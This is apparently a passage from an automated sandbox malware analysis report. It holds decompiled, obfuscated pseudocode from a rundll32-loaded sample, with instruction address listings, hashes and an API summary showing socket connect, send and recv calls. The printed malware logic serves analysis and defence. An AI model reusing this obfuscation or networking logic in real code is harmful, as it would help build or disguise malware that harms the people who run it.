                                                                                                                                  							E002E1E67(_v1812, _v1732, _v1660, _v1820, _v1600);
                                                                                                                                  							_t682 =  &(_t682[3]);
                                                                                                                                  							_t677 = 0xe6feec1;
                                                                                                                                  							_t583 = 0x7574965;
                                                                                                                                  							_t620 = 0x424d9d2;
                                                                                                                                  							L25:
                                                                                                                                  							__eflags = _t677 - 0xe6feec1;
                                                                                                                                  						} while (__eflags != 0);
                                                                                                                                  						return _t583;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  0x002e71e2
                                                                                                                                  0x002e71ea
                                                                                                                                  0x002e7200
                                                                                                                                  0x002e7207
                                                                                                                                  0x002e720f
                                                                                                                                  0x002e721a
                                                                                                                                  0x002e7225
                                                                                                                                  0x002e7230
                                                                                                                                  0x002e723b
                                                                                                                                  0x002e7248
                                                                                                                                  0x002e7249
                                                                                                                                  0x002e7253
                                                                                                                                  0x002e7257
                                                                                                                                  0x002e725c
                                                                                                                                  0x002e7264
                                                                                                                                  0x002e726f
                                                                                                                                  0x002e727a
                                                                                                                                  0x002e7285
                                                                                                                                  0x002e7296
                                                                                                                                  0x002e7299
                                                                                                                                  0x002e729d
                                                                                                                                  0x002e72a5
                                                                                                                                  0x002e72ad
                                                                                                                                  0x002e72b5
                                                                                                                                  0x002e72bd
                                                                                                                                  0x002e72c7
                                                                                                                                  0x002e72cb
                                                                                                                                  0x002e72d3
                                                                                                                                  0x002e72e6
                                                                                                                                  0x002e72ed
                                                                                                                                  0x002e72f8
                                                                                                                                  0x002e7303
                                                                                                                                  0x002e730e
                                                                                                                                  0x002e7319
                                                                                                                                  0x002e7324
                                                                                                                                  0x002e732c
                                                                                                                                  0x002e7344
                                                                                                                                  0x002e7348
                                                                                                                                  0x002e7350
                                                                                                                                  0x002e7363
                                                                                                                                  0x002e7366
                                                                                                                                  0x002e736d
                                                                                                                                  0x002e7378
                                                                                                                                  0x002e7380
                                                                                                                                  0x002e7388
                                                                                                                                  0x002e738d
                                                                                                                                  0x002e7395
                                                                                                                                  0x002e739d
                                                                                                                                  0x002e73a8
                                                                                                                                  0x002e73b0
                                                                                                                                  0x002e73bb
                                                                                                                                  0x002e73c3
                                                                                                                                  0x002e73cb
                                                                                                                                  0x002e73d0
                                                                                                                                  0x002e73d5
                                                                                                                                  0x002e73dd
                                                                                                                                  0x002e73e8
                                                                                                                                  0x002e73f0
                                                                                                                                  0x002e73fb
                                                                                                                                  0x002e740f
                                                                                                                                  0x002e7416
                                                                                                                                  0x002e7421
                                                                                                                                  0x002e742e
                                                                                                                                  0x002e7432
                                                                                                                                  0x002e743a
                                                                                                                                  0x002e743f
                                                                                                                                  0x002e7447
                                                                                                                                  0x002e744f
                                                                                                                                  0x002e7454
                                                                                                                                  0x002e7459
                                                                                                                                  0x002e7461
                                                                                                                                  0x002e746e
                                                                                                                                  0x002e7472
                                                                                                                                  0x002e747a
                                                                                                                                  0x002e7482
                                                                                                                                  0x002e748d
                                                                                                                                  0x002e7498
                                                                                                                                  0x002e74a3
                                                                                                                                  0x002e74ab
                                                                                                                                  0x002e74b0
                                                                                                                                  0x002e74be
                                                                                                                                  0x002e74c8
                                                                                                                                  0x002e74cc
                                                                                                                                  0x002e74d4
                                                                                                                                  0x002e74df
                                                                                                                                  0x002e74f5
                                                                                                                                  0x002e74fe
                                                                                                                                  0x002e7509
                                                                                                                                  0x002e7514
                                                                                                                                  0x002e751f
                                                                                                                                  0x002e752a
                                                                                                                                  0x002e7532
                                                                                                                                  0x002e7537
                                                                                                                                  0x002e753c
                                                                                                                                  0x002e7541
                                                                                                                                  0x002e7549
                                                                                                                                  0x002e7554
                                                                                                                                  0x002e755c
                                                                                                                                  0x002e7567
                                                                                                                                  0x002e7572
                                                                                                                                  0x002e757a
                                                                                                                                  0x002e7585
                                                                                                                                  0x002e7590
                                                                                                                                  0x002e759d
                                                                                                                                  0x002e759e
                                                                                                                                  0x002e75a2
                                                                                                                                  0x002e75a7
                                                                                                                                  0x002e75af
                                                                                                                                  0x002e75b7
                                                                                                                                  0x002e75c1
                                                                                                                                  0x002e75c5
                                                                                                                                  0x002e75cd
                                                                                                                                  0x002e75d5
                                                                                                                                  0x002e75e8
                                                                                                                                  0x002e75ef
                                                                                                                                  0x002e75fa
                                                                                                                                  0x002e7602
                                                                                                                                  0x002e760a
                                                                                                                                  0x002e7612
                                                                                                                                  0x002e761a
                                                                                                                                  0x002e7622
                                                                                                                                  0x002e762a
                                                                                                                                  0x002e762f
                                                                                                                                  0x002e7637
                                                                                                                                  0x002e763f
                                                                                                                                  0x002e7647
                                                                                                                                  0x002e7652
                                                                                                                                  0x002e765a
                                                                                                                                  0x002e7665
                                                                                                                                  0x002e766d
                                                                                                                                  0x002e7675
                                                                                                                                  0x002e767d
                                                                                                                                  0x002e7685
                                                                                                                                  0x002e7690
                                                                                                                                  0x002e769b
                                                                                                                                  0x002e76a6
                                                                                                                                  0x002e76b1
                                                                                                                                  0x002e76c5
                                                                                                                                  0x002e76cc
                                                                                                                                  0x002e76d7
                                                                                                                                  0x002e76df
                                                                                                                                  0x002e76e7
                                                                                                                                  0x002e76ec
                                                                                                                                  0x002e76f4
                                                                                                                                  0x002e76fc
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e770d
                                                                                                                                  0x00000000
                                                                                                                                  0x002e770d
                                                                                                                                  0x002e7717
                                                                                                                                  0x002e799c
                                                                                                                                  0x002e79aa
                                                                                                                                  0x002e79ca
                                                                                                                                  0x002e79cf
                                                                                                                                  0x002e79d2
                                                                                                                                  0x002e79d4
                                                                                                                                  0x002e79fa
                                                                                                                                  0x002e7a1f
                                                                                                                                  0x002e7a24
                                                                                                                                  0x002e7a24
                                                                                                                                  0x002e78e9
                                                                                                                                  0x002e78e9
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e7708
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7723
                                                                                                                                  0x002e7977
                                                                                                                                  0x002e7983
                                                                                                                                  0x002e798a
                                                                                                                                  0x002e798f
                                                                                                                                  0x002e7994
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7994
                                                                                                                                  0x002e772f
                                                                                                                                  0x002e7913
                                                                                                                                  0x002e7915
                                                                                                                                  0x002e7957
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7957
                                                                                                                                  0x002e7917
                                                                                                                                  0x002e7918
                                                                                                                                  0x002e793d
                                                                                                                                  0x002e7942
                                                                                                                                  0x002e7945
                                                                                                                                  0x002e7947
                                                                                                                                  0x002e77e4
                                                                                                                                  0x002e77e4
                                                                                                                                  0x002e77e4
                                                                                                                                  0x002e794d

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                                  • API String ID: 0-2206596976
                                                                                                                                  • Opcode ID: c914cbb910e02b4d1b8fc699c028d7e9455d39e77e7df95cb69886fa927cd01e
                                                                                                                                  • Instruction ID: 72ba60fbb5596dc1a59245afc21f0724c0cb1e19747a1ee5334bbec773757c8a
                                                                                                                                  • Opcode Fuzzy Hash: c914cbb910e02b4d1b8fc699c028d7e9455d39e77e7df95cb69886fa927cd01e
                                                                                                                                  • Instruction Fuzzy Hash: 8F52FC715083818BD378CF21C98AB9FBBE1BBC4308F508A1DE5DA96260D7B18959CF53
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 10012C6C
                                                                                                                                  • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                                  • _strcat.LIBCMT ref: 10012CE9
                                                                                                                                  • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                                  • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                                    • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                    • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                    • Part of subcall function 1001DD46: GetDlgItem.USER32(?,4CC2CB6B), ref: 1001DD53
                                                                                                                                    • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                                  • String ID: Connected$Disconnected$Wait...
                                                                                                                                  • API String ID: 2263617321-2304371739
                                                                                                                                  • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                  • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                                  • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                  • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002D2251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				char _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				void* _t323;
                                                                                                                                  				signed int _t369;
                                                                                                                                  				signed int _t371;
                                                                                                                                  				signed int _t372;
                                                                                                                                  				signed int _t373;
                                                                                                                                  				signed int _t374;
                                                                                                                                  				signed int _t375;
                                                                                                                                  				signed int _t376;
                                                                                                                                  				signed int _t377;
                                                                                                                                  				signed int _t378;
                                                                                                                                  				signed int _t379;
                                                                                                                                  				void* _t382;
                                                                                                                                  				signed int* _t424;
                                                                                                                                  				void* _t427;
                                                                                                                                  				void* _t428;
                                                                                                                                  				void* _t431;
                                                                                                                                  
                                                                                                                                  				_t425 = _a4;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_t424 = __edx;
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t323);
                                                                                                                                  				_v104 = 0xfd7ba2;
                                                                                                                                  				_t428 = _t427 + 0x14;
                                                                                                                                  				_v104 = _v104 << 2;
                                                                                                                                  				_v104 = _v104 ^ 0x03f5ee88;
                                                                                                                                  				_t382 = 0x3e8dc94;
                                                                                                                                  				_v112 = 0x53a35e;
                                                                                                                                  				_t371 = 0x1c;
                                                                                                                                  				_v112 = _v112 / _t371;
                                                                                                                                  				_v112 = _v112 << 0xb;
                                                                                                                                  				_v112 = _v112 ^ 0x17ec1018;
                                                                                                                                  				_v100 = 0x45b9a1;
                                                                                                                                  				_v100 = _v100 + 0xffff7cfc;
                                                                                                                                  				_v100 = _v100 ^ 0x004aa95b;
                                                                                                                                  				_v92 = 0xd93693;
                                                                                                                                  				_v92 = _v92 + 0xb87a;
                                                                                                                                  				_v92 = _v92 ^ 0x00df4f59;
                                                                                                                                  				_v160 = 0x746cf1;
                                                                                                                                  				_v160 = _v160 ^ 0x2b133776;
                                                                                                                                  				_v160 = _v160 + 0xffff944c;
                                                                                                                                  				_v160 = _v160 / _t371;
                                                                                                                                  				_v160 = _v160 ^ 0x0189d9d1;
                                                                                                                                  				_v144 = 0x9ec305;
                                                                                                                                  				_v144 = _v144 + 0xffffd43e;
                                                                                                                                  				_v144 = _v144 << 3;
                                                                                                                                  				_v144 = _v144 ^ 0x04f670ec;
                                                                                                                                  				_v148 = 0x64c482;
                                                                                                                                  				_v148 = _v148 + 0x3823;
                                                                                                                                  				_t372 = 0x6f;
                                                                                                                                  				_v148 = _v148 / _t372;
                                                                                                                                  				_v148 = _v148 ^ 0x000f1a49;
                                                                                                                                  				_v68 = 0x131d36;
                                                                                                                                  				_v68 = _v68 ^ 0xb06b804d;
                                                                                                                                  				_v68 = _v68 ^ 0xb072f73d;
                                                                                                                                  				_v124 = 0xcf68d3;
                                                                                                                                  				_v124 = _v124 + 0x418a;
                                                                                                                                  				_v124 = _v124 + 0xdb2c;
                                                                                                                                  				_v124 = _v124 ^ 0x00d4c88c;
                                                                                                                                  				_v140 = 0x60ea9a;
                                                                                                                                  				_v140 = _v140 >> 0xa;
                                                                                                                                  				_v140 = _v140 >> 4;
                                                                                                                                  				_v140 = _v140 ^ 0x0002f747;
                                                                                                                                  				_v116 = 0xa906b8;
                                                                                                                                  				_t373 = 0x61;
                                                                                                                                  				_v116 = _v116 * 0x66;
                                                                                                                                  				_v116 = _v116 / _t373;
                                                                                                                                  				_v116 = _v116 ^ 0x00b9e105;
                                                                                                                                  				_v152 = 0x1b4b23;
                                                                                                                                  				_v152 = _v152 + 0x6529;
                                                                                                                                  				_v152 = _v152 << 7;
                                                                                                                                  				_v152 = _v152 ^ 0x0dd37b6c;
                                                                                                                                  				_v56 = 0xb64e13;
                                                                                                                                  				_t374 = 0x36;
                                                                                                                                  				_v56 = _v56 / _t374;
                                                                                                                                  				_v56 = _v56 ^ 0x000ccadc;
                                                                                                                                  				_v180 = 0xa61587;
                                                                                                                                  				_v180 = _v180 ^ 0x79fc160a;
                                                                                                                                  				_t375 = 0x7a;
                                                                                                                                  				_v180 = _v180 * 0x16;
                                                                                                                                  				_v180 = _v180 ^ 0x4f1bf23d;
                                                                                                                                  				_v180 = _v180 ^ 0x22abe71e;
                                                                                                                                  				_v120 = 0x473252;
                                                                                                                                  				_v120 = _v120 + 0xffff4692;
                                                                                                                                  				_v120 = _v120 / _t375;
                                                                                                                                  				_v120 = _v120 ^ 0x000f54d2;
                                                                                                                                  				_v60 = 0x2fd158;
                                                                                                                                  				_v60 = _v60 + 0x5b64;
                                                                                                                                  				_v60 = _v60 ^ 0x0034a0e9;
                                                                                                                                  				_v84 = 0xc57bbf;
                                                                                                                                  				_v84 = _v84 ^ 0x7beef004;
                                                                                                                                  				_v84 = _v84 ^ 0x7b204221;
                                                                                                                                  				_v52 = 0xc39e48;
                                                                                                                                  				_t376 = 0x4d;
                                                                                                                                  				_v52 = _v52 / _t376;
                                                                                                                                  				_v52 = _v52 ^ 0x0006d078;
                                                                                                                                  				_v108 = 0x102acf;
                                                                                                                                  				_v108 = _v108 >> 0xa;
                                                                                                                                  				_v108 = _v108 ^ 0x000242b6;
                                                                                                                                  				_v80 = 0xaaee53;
                                                                                                                                  				_t377 = 0x79;
                                                                                                                                  				_v80 = _v80 * 0x74;
                                                                                                                                  				_v80 = _v80 ^ 0x4d7dabdb;
                                                                                                                                  				_v88 = 0x1ad2b9;
                                                                                                                                  				_v88 = _v88 | 0x310da8db;
                                                                                                                                  				_v88 = _v88 ^ 0x311cb062;
                                                                                                                                  				_v136 = 0x81cc6c;
                                                                                                                                  				_v136 = _v136 >> 0xc;
                                                                                                                                  				_v136 = _v136 << 0xd;
                                                                                                                                  				_v136 = _v136 ^ 0x0107e876;
                                                                                                                                  				_v96 = 0x2bc0c4;
                                                                                                                                  				_v96 = _v96 * 0x4c;
                                                                                                                                  				_v96 = _v96 ^ 0x0cfd01fe;
                                                                                                                                  				_v176 = 0x403c4e;
                                                                                                                                  				_t174 =  &_v176; // 0x403c4e
                                                                                                                                  				_v176 =  *_t174 / _t377;
                                                                                                                                  				_t180 =  &_v176; // 0x403c4e
                                                                                                                                  				_v176 =  *_t180 * 0x5e;
                                                                                                                                  				_v176 = _v176 << 5;
                                                                                                                                  				_v176 = _v176 ^ 0x0632c8a8;
                                                                                                                                  				_v44 = 0x1618ce;
                                                                                                                                  				_v44 = _v44 + 0xffff8813;
                                                                                                                                  				_v44 = _v44 ^ 0x00124c47;
                                                                                                                                  				_v76 = 0x551030;
                                                                                                                                  				_v76 = _v76 + 0x65ef;
                                                                                                                                  				_v76 = _v76 ^ 0x005f521e;
                                                                                                                                  				_v132 = 0xb7ed4f;
                                                                                                                                  				_v132 = _v132 << 0xb;
                                                                                                                                  				_v132 = _v132 >> 0xa;
                                                                                                                                  				_v132 = _v132 ^ 0x002e4b92;
                                                                                                                                  				_v64 = 0xfb13c3;
                                                                                                                                  				_v64 = _v64 * 0x16;
                                                                                                                                  				_v64 = _v64 ^ 0x159ca6b2;
                                                                                                                                  				_v168 = 0x8e8363;
                                                                                                                                  				_v168 = _v168 ^ 0x49fc5726;
                                                                                                                                  				_v168 = _v168 >> 8;
                                                                                                                                  				_v168 = _v168 >> 4;
                                                                                                                                  				_v168 = _v168 ^ 0x0002bf0f;
                                                                                                                                  				_v72 = 0x8b4c84;
                                                                                                                                  				_t378 = 0x68;
                                                                                                                                  				_v72 = _v72 / _t378;
                                                                                                                                  				_v72 = _v72 ^ 0x00015b8a;
                                                                                                                                  				_v128 = 0x282e65;
                                                                                                                                  				_v128 = _v128 >> 3;
                                                                                                                                  				_v128 = _v128 << 9;
                                                                                                                                  				_v128 = _v128 ^ 0x0a079d52;
                                                                                                                                  				_v156 = 0xadd370;
                                                                                                                                  				_t379 = 0x3e;
                                                                                                                                  				_v156 = _v156 / _t379;
                                                                                                                                  				_v156 = _v156 << 0xf;
                                                                                                                                  				_v156 = _v156 + 0xffff35e7;
                                                                                                                                  				_v156 = _v156 ^ 0x66d9d095;
                                                                                                                                  				_v164 = 0xb0b7ce;
                                                                                                                                  				_v164 = _v164 + 0xffffdc7a;
                                                                                                                                  				_v164 = _v164 * 0x61;
                                                                                                                                  				_v164 = _v164 + 0xffff24b0;
                                                                                                                                  				_v164 = _v164 ^ 0x42ea90cd;
                                                                                                                                  				_v172 = 0xee7b33;
                                                                                                                                  				_v172 = _v172 | 0x904c1683;
                                                                                                                                  				_v172 = _v172 * 0x2c;
                                                                                                                                  				_v172 = _v172 >> 4;
                                                                                                                                  				_v172 = _v172 ^ 0x0e8d9d52;
                                                                                                                                  				_v48 = 0xdaf5e6;
                                                                                                                                  				_v48 = _v48 ^ 0xf4ca4d64;
                                                                                                                                  				_v48 = _v48 ^ 0xf41f1779;
                                                                                                                                  				goto L1;
                                                                                                                                  				do {
                                                                                                                                  					while(1) {
                                                                                                                                  						L1:
                                                                                                                                  						_t431 = _t382 - 0x9c1484f;
                                                                                                                                  						if(_t431 > 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						if(_t431 == 0) {
                                                                                                                                  							E002D3DBC( &_v40, _t424, _v160, _v144, _v148);
                                                                                                                                  							_t428 = _t428 + 0xc;
                                                                                                                                  							_t382 = 0x9229f3e;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t382 == 0x3e8dc94) {
                                                                                                                                  								_t382 = 0xb0d10f2;
                                                                                                                                  								 *_t424 =  *_t424 & 0x00000000;
                                                                                                                                  								_t424[1] = _v104;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t382 == 0x73dcb22) {
                                                                                                                                  									E002E0DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
                                                                                                                                  									_t428 = _t428 + 0x10;
                                                                                                                                  									_t382 = 0xca0d778;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t382 == 0x8cfc35c) {
                                                                                                                                  										E002E0DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
                                                                                                                                  										_t428 = _t428 + 0x10;
                                                                                                                                  										_t382 = 0xfa9ed0f;
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t382 == 0x9229f3e) {
                                                                                                                                  											E002F0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
                                                                                                                                  											_t428 = _t428 + 0x10;
                                                                                                                                  											_t382 = 0xa7e786e;
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											if(_t382 != 0x95701e8) {
                                                                                                                                  												goto L24;
                                                                                                                                  											} else {
                                                                                                                                  												_push(_t382);
                                                                                                                                  												_push(_t382);
                                                                                                                                  												_t369 = E002D7FF2(_t424[1]);
                                                                                                                                  												 *_t424 = _t369;
                                                                                                                                  												if(_t369 != 0) {
                                                                                                                                  													_t382 = 0x9c1484f;
                                                                                                                                  													continue;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L27:
                                                                                                                                  						__eflags =  *_t424;
                                                                                                                                  						_t322 =  *_t424 != 0;
                                                                                                                                  						__eflags = _t322;
                                                                                                                                  						return 0 | _t322;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t382 - 0xa7e786e;
                                                                                                                                  					if(_t382 == 0xa7e786e) {
                                                                                                                                  						E002E0DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
                                                                                                                                  						_t428 = _t428 + 0x10;
                                                                                                                                  						_t382 = 0x8cfc35c;
                                                                                                                                  						goto L24;
                                                                                                                                  					} else {
                                                                                                                                  						__eflags = _t382 - 0xa84b454;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							E002F0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
                                                                                                                                  						} else {
                                                                                                                                  							__eflags = _t382 - 0xb0d10f2;
                                                                                                                                  							if(_t382 == 0xb0d10f2) {
                                                                                                                                  								_t424[1] = E002EC631(_t425);
                                                                                                                                  								_t382 = 0x95701e8;
                                                                                                                                  								goto L1;
                                                                                                                                  							} else {
                                                                                                                                  								__eflags = _t382 - 0xca0d778;
                                                                                                                                  								if(_t382 == 0xca0d778) {
                                                                                                                                  									E002E0DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
                                                                                                                                  									_t428 = _t428 + 0x10;
                                                                                                                                  									_t382 = 0xa84b454;
                                                                                                                                  									goto L1;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t382 - 0xfa9ed0f;
                                                                                                                                  									if(_t382 != 0xfa9ed0f) {
                                                                                                                                  										goto L24;
                                                                                                                                  									} else {
                                                                                                                                  										E002E0DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
                                                                                                                                  										_t428 = _t428 + 0x10;
                                                                                                                                  										_t382 = 0x73dcb22;
                                                                                                                                  										goto L1;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L27;
                                                                                                                                  					L24:
                                                                                                                                  					__eflags = _t382 - 0xd4a25d5;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L27;
                                                                                                                                  			}

                                                                                                                                  0x002d22dd
                                                                                                                                  0x002d22e5
                                                                                                                                  0x002d22ed
                                                                                                                                  0x002d22f5
                                                                                                                                  0x002d22fd
                                                                                                                                  0x002d230d
                                                                                                                                  0x002d2313
                                                                                                                                  0x002d231b
                                                                                                                                  0x002d2323
                                                                                                                                  0x002d232b
                                                                                                                                  0x002d2330
                                                                                                                                  0x002d2338
                                                                                                                                  0x002d2340
                                                                                                                                  0x002d234c
                                                                                                                                  0x002d2351
                                                                                                                                  0x002d2357
                                                                                                                                  0x002d235f
                                                                                                                                  0x002d236a
                                                                                                                                  0x002d2375
                                                                                                                                  0x002d2380
                                                                                                                                  0x002d2388
                                                                                                                                  0x002d2390
                                                                                                                                  0x002d2398
                                                                                                                                  0x002d23a0
                                                                                                                                  0x002d23a8
                                                                                                                                  0x002d23ad
                                                                                                                                  0x002d23b2
                                                                                                                                  0x002d23ba
                                                                                                                                  0x002d23c7
                                                                                                                                  0x002d23c8
                                                                                                                                  0x002d23d2
                                                                                                                                  0x002d23d6
                                                                                                                                  0x002d23de
                                                                                                                                  0x002d23e6
                                                                                                                                  0x002d23ee
                                                                                                                                  0x002d23f3
                                                                                                                                  0x002d23fd
                                                                                                                                  0x002d2411
                                                                                                                                  0x002d2416
                                                                                                                                  0x002d241f
                                                                                                                                  0x002d242a
                                                                                                                                  0x002d2432
                                                                                                                                  0x002d243f
                                                                                                                                  0x002d2442
                                                                                                                                  0x002d2446
                                                                                                                                  0x002d244e
                                                                                                                                  0x002d2456
                                                                                                                                  0x002d245e
                                                                                                                                  0x002d246e
                                                                                                                                  0x002d2472
                                                                                                                                  0x002d247a
                                                                                                                                  0x002d2485
                                                                                                                                  0x002d2490
                                                                                                                                  0x002d249b
                                                                                                                                  0x002d24a3
                                                                                                                                  0x002d24ab
                                                                                                                                  0x002d24b3
                                                                                                                                  0x002d24c5
                                                                                                                                  0x002d24ca
                                                                                                                                  0x002d24d3
                                                                                                                                  0x002d24de
                                                                                                                                  0x002d24e6
                                                                                                                                  0x002d24eb
                                                                                                                                  0x002d24f3
                                                                                                                                  0x002d2500
                                                                                                                                  0x002d2501
                                                                                                                                  0x002d2505
                                                                                                                                  0x002d250d
                                                                                                                                  0x002d2515
                                                                                                                                  0x002d251d
                                                                                                                                  0x002d2525
                                                                                                                                  0x002d252d
                                                                                                                                  0x002d2532
                                                                                                                                  0x002d2537
                                                                                                                                  0x002d253f
                                                                                                                                  0x002d254c
                                                                                                                                  0x002d2550
                                                                                                                                  0x002d2558
                                                                                                                                  0x002d2560
                                                                                                                                  0x002d2566
                                                                                                                                  0x002d256a
                                                                                                                                  0x002d256f
                                                                                                                                  0x002d2573
                                                                                                                                  0x002d2578
                                                                                                                                  0x002d2580
                                                                                                                                  0x002d258b
                                                                                                                                  0x002d2596
                                                                                                                                  0x002d25a1
                                                                                                                                  0x002d25a9
                                                                                                                                  0x002d25b1
                                                                                                                                  0x002d25b9
                                                                                                                                  0x002d25c1
                                                                                                                                  0x002d25c6
                                                                                                                                  0x002d25cb
                                                                                                                                  0x002d25d3
                                                                                                                                  0x002d25e6
                                                                                                                                  0x002d25ed
                                                                                                                                  0x002d25f8
                                                                                                                                  0x002d2600
                                                                                                                                  0x002d2608
                                                                                                                                  0x002d260d
                                                                                                                                  0x002d2612
                                                                                                                                  0x002d261c
                                                                                                                                  0x002d2635
                                                                                                                                  0x002d263a
                                                                                                                                  0x002d2643
                                                                                                                                  0x002d264e
                                                                                                                                  0x002d2656
                                                                                                                                  0x002d265b
                                                                                                                                  0x002d2660
                                                                                                                                  0x002d2668
                                                                                                                                  0x002d2674
                                                                                                                                  0x002d267c
                                                                                                                                  0x002d2680
                                                                                                                                  0x002d2685
                                                                                                                                  0x002d268d
                                                                                                                                  0x002d2695
                                                                                                                                  0x002d269d
                                                                                                                                  0x002d26aa
                                                                                                                                  0x002d26ae
                                                                                                                                  0x002d26b6
                                                                                                                                  0x002d26be
                                                                                                                                  0x002d26c6
                                                                                                                                  0x002d26d3
                                                                                                                                  0x002d26d7
